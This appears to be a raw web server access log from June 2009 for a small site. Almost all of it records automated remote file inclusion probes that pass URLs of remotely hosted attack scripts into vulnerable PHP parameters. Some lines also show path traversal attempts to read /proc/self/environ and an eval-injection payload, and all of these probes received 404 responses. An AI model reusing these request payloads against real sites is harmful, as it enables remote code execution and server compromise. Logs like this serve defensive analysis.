72.82.228.83 - - [29/Jun/2009:08:44:09 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
72.82.228.83 - - [29/Jun/2009:08:44:09 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
72.82.228.83 - - [29/Jun/2009:08:44:10 -0700] "GET /logs/access_090420.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
72.82.228.83 - - [29/Jun/2009:08:48:32 -0700] "GET /logs/access_090420.log%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
72.82.228.83 - - [29/Jun/2009:08:48:32 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
72.82.228.83 - - [29/Jun/2009:08:48:32 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
67.18.98.186 - - [29/Jun/2009:08:49:55 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
89.191.11.195 - - [29/Jun/2009:08:51:04 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.toulouseangloexchange.com"
89.191.11.195 - - [29/Jun/2009:08:51:04 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.toulouseangloexchange.com"
89.191.11.195 - - [29/Jun/2009:08:51:04 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.toulouseangloexchange.com"
89.191.11.195 - - [29/Jun/2009:08:51:04 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
89.191.11.195 - - [29/Jun/2009:08:51:04 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
89.191.11.195 - - [29/Jun/2009:08:51:04 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
89.191.11.195 - - [29/Jun/2009:08:51:04 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.toulouseangloexchange.com"
89.191.11.195 - - [29/Jun/2009:08:51:04 -0700] "GET /include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.toulouseangloexchange.com"
89.191.11.195 - - [29/Jun/2009:08:51:04 -0700] "GET /logs//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.toulouseangloexchange.com"
89.191.11.195 - - [29/Jun/2009:08:51:05 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.toulouseangloexchange.com"
89.191.11.195 - - [29/Jun/2009:08:51:05 -0700] "GET /include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.toulouseangloexchange.com"
89.191.11.195 - - [29/Jun/2009:08:51:05 -0700] "GET /logs//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.toulouseangloexchange.com"
210.220.213.203 - - [29/Jun/2009:08:54:19 -0700] "GET /logs/errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
210.220.213.203 - - [29/Jun/2009:08:54:19 -0700] "GET /logs/access_090420.log/errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
210.220.213.203 - - [29/Jun/2009:08:54:19 -0700] "GET /errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
210.220.213.203 - - [29/Jun/2009:08:55:30 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:08:59:11 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:08:59:11 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:08:59:11 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:08:59:18 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:08:59:18 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:08:59:19 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
74.6.17.172 - - [29/Jun/2009:09:00:13 -0700] "GET /sitebuilder/?N=D HTTP/1.0" 200 520 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:00:34 -0700] "GET /logs/access_090420.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:00:39 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:00:39 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:00:39 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:00:50 -0700] "GET /logs/access_090420.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
210.220.213.203 - - [29/Jun/2009:09:00:52 -0700] "GET /logs/access_090420.log%20%20/errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:02:00 -0700] "GET /logs/access_090420.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
193.243.139.4 - - [29/Jun/2009:09:03:45 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
193.243.139.4 - - [29/Jun/2009:09:03:45 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
193.243.139.4 - - [29/Jun/2009:09:03:45 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:04:34 -0700] "GET /logs/access.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:04:34 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:04:34 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:04:43 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:04:43 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:04:43 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:04:48 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:04:48 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:04:48 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
82.194.87.219 - - [29/Jun/2009:09:04:48 -0700] "GET /logs///components/com_performs/performs.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:05:13 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:05:13 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:05:13 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
82.194.87.219 - - [29/Jun/2009:09:06:00 -0700] "GET /logs///components/com_performs/performs.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:06:36 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:06:36 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:06:36 -0700] "GET /logs/access.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:07:51 -0700] "GET /logs/access.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:07:51 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:07:51 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
80.93.48.103 - - [29/Jun/2009:09:08:25 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.scoringsessions.com///img/large/2006/missionimpossible3/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.toulouseangloexchange.com"
82.194.87.219 - - [29/Jun/2009:09:08:58 -0700] "GET /logs///components/com_performs/performs.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.toulouseangloexchange.com"
193.243.139.4 - - [29/Jun/2009:09:09:58 -0700] "GET /phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
193.243.139.4 - - [29/Jun/2009:09:09:58 -0700] "GET /logs/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
193.243.139.4 - - [29/Jun/2009:09:09:58 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
193.243.139.4 - - [29/Jun/2009:09:11:22 -0700] "GET /logs/access_090420.log%20%20/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
82.194.87.219 - - [29/Jun/2009:09:11:27 -0700] "GET /logs///components/com_performs/performs.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.toulouseangloexchange.com"
210.220.213.203 - - [29/Jun/2009:09:11:37 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
210.220.213.203 - - [29/Jun/2009:09:11:38 -0700] "GET //vwar/backup/errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
210.220.213.203 - - [29/Jun/2009:09:11:53 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
64.186.128.233 - - [29/Jun/2009:09:15:55 -0700] "GET /include/lib.inc.php?site_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
64.186.128.233 - - [29/Jun/2009:09:15:55 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
64.186.128.233 - - [29/Jun/2009:09:16:00 -0700] "GET /logs//include/lib.inc.php?site_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
80.93.48.103 - - [29/Jun/2009:09:16:08 -0700] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.scoringsessions.com///img/large/2006/missionimpossible3/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.toulouseangloexchange.com"
193.243.139.4 - - [29/Jun/2009:09:19:04 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
217.147.29.190 - - [29/Jun/2009:09:23:11 -0700] "GET /includes/functions_portal.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
217.147.29.190 - - [29/Jun/2009:09:23:11 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
217.147.29.190 - - [29/Jun/2009:09:23:11 -0700] "GET /logs/access_090323.log%20%20//includes/functions_portal.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
217.147.29.190 - - [29/Jun/2009:09:23:48 -0700] "GET /logs/access_090105.log%20%20//includes/functions_portal.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:25:00 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:26:01 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
163.20.160.14 - - [29/Jun/2009:09:26:26 -0700] "GET /logs/access.log%20%20//bemarket/postscript/postscript.php?p_mode=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:09:26:34 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
72.44.187.42 - - [29/Jun/2009:09:27:41 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.27.203.107 - - [29/Jun/2009:09:33:31 -0700] "GET /logs/access.log///include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.27.203.107 - - [29/Jun/2009:09:33:32 -0700] "GET /logs///include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
82.194.87.219 - - [29/Jun/2009:09:33:34 -0700] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.toulouseangloexchange.com"
218.27.203.107 - - [29/Jun/2009:09:35:28 -0700] "GET /logs/access.log///include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.27.203.107 - - [29/Jun/2009:09:35:28 -0700] "GET /logs///include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
79.8.85.135 - - [29/Jun/2009:09:48:31 -0700] "GET /main.php?sayfa=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
79.8.85.135 - - [29/Jun/2009:09:48:32 -0700] "GET /logs/access_090420.log//main.php?sayfa=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
79.8.85.135 - - [29/Jun/2009:09:48:32 -0700] "GET /logs//main.php?sayfa=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.38.243.71 - - [29/Jun/2009:09:48:46 -0700] "GET /logs/access.log//bbs_n/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
79.8.85.135 - - [29/Jun/2009:09:49:01 -0700] "GET /logs/access_090420.log%20%20//main.php?sayfa=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.38.243.71 - - [29/Jun/2009:09:49:07 -0700] "GET /logs/access_090420.log//bbs_n/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.38.243.71 - - [29/Jun/2009:09:50:03 -0700] "GET /logs/access_090420.log///include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.38.243.71 - - [29/Jun/2009:09:50:07 -0700] "GET /logs/access_090420.log//bbs_n/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
208.80.195.122 - - [29/Jun/2009:09:50:30 -0700] "GET / HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; ZangoToolbar 4.8.2; yplus 5.1.02b)" "www.toulouseangloexchange.com"
79.8.85.135 - - [29/Jun/2009:09:51:06 -0700] "GET /logs/access_090511.log%20%20//main.php?sayfa=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.38.243.71 - - [29/Jun/2009:09:54:03 -0700] "GET /bbs_n/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.38.243.71 - - [29/Jun/2009:09:54:09 -0700] "GET /logs//bbs_n/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.38.243.71 - - [29/Jun/2009:09:54:09 -0700] "GET /logs/access.log%20%20//bbs_n/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.38.243.71 - - [29/Jun/2009:09:54:20 -0700] "GET /bbs_n/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.38.243.71 - - [29/Jun/2009:09:54:25 -0700] "GET /bbs_n/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.38.243.71 - - [29/Jun/2009:09:54:27 -0700] "GET /logs//bbs_n/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
